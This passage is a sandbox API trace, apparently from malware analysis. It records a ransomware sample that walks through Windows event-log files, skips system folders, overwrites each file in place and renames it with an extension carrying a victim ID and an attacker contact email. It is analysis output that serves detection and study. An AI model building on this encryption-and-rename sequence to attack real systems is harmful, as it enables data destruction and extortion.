lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.642] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.642] CloseHandle (hObject=0x450) returned 1 [0065.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0065.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0065.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0065.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0065.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0065.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ef08 [0065.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.644] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0065.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0065.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0065.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.645] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b4bacf, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b4bacf, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cAlternateFileName="MI6B25~1.EVT")) returned 1 [0065.645] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2=".") returned 1 [0065.645] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="..") returned 1 [0065.645] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="...") returned 1 [0065.645] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="windows") returned -1 [0065.645] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="recovery") returned -1 [0065.645] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="perflogs") returned -1 [0065.645] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="documents and settings") returned 1 [0065.645] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.645] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="system volume information") returned -1 [0065.645] lstrcmpiW (lpString1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpString2="msocache") returned -1 [0065.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0065.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0065.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0065.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cchWideChar=51, lpMultiByteStr=0x20de78, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpUsedDefaultChar=0x0) returned 51 [0065.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0065.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0065.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0065.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cchWideChar=51, lpMultiByteStr=0x20e268, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpUsedDefaultChar=0x0) returned 51 [0065.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0065.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0065.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0065.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0065.645] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.646] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.646] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.646] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.660] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.660] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.660] CloseHandle (hObject=0x450) returned 1 [0065.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0065.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0065.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0065.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0065.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.663] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0065.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0065.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0065.664] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb66288f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-International%4Operational.evtx", cAlternateFileName="MI854A~1.EVT")) returned 1 [0065.664] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2=".") returned 1 [0065.664] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="..") returned 1 [0065.664] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="...") returned 1 [0065.664] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="windows") returned -1 [0065.664] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="recovery") returned -1 [0065.664] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="perflogs") returned -1 [0065.664] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.664] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.664] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="system volume information") returned -1 [0065.664] lstrcmpiW (lpString1="Microsoft-Windows-International%4Operational.evtx", lpString2="msocache") returned -1 [0065.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0065.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-International%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0065.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0065.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-International%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x20e268, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-International%4Operational.evtx", lpUsedDefaultChar=0x0) returned 49 [0065.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0065.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0065.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-International%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0065.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-International%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x20e418, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-International%4Operational.evtx", lpUsedDefaultChar=0x0) returned 49 [0065.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0065.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0065.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0065.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0065.665] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.667] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.668] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.668] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.674] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.675] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.675] CloseHandle (hObject=0x450) returned 1 [0065.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0065.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0065.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0065.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0065.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0065.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f280 [0065.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.678] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0065.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0065.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0065.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.678] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ad1ac, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x506ad1ac, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-Boot%4Operational.evtx", cAlternateFileName="MI32CE~1.EVT")) returned 1 [0065.679] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2=".") returned 1 [0065.679] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="..") returned 1 [0065.679] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="...") returned 1 [0065.679] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="windows") returned -1 [0065.679] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="recovery") returned -1 [0065.679] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="perflogs") returned -1 [0065.679] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.679] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.679] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="system volume information") returned -1 [0065.679] lstrcmpiW (lpString1="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpString2="msocache") returned -1 [0065.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0065.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-Boot%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0065.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-Boot%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x1f87c0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpUsedDefaultChar=0x0) returned 47 [0065.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0065.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0065.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-Boot%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0065.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Kernel-Boot%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x1f8328, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpUsedDefaultChar=0x0) returned 47 [0065.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0065.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0065.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0065.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0065.679] CreateFileW 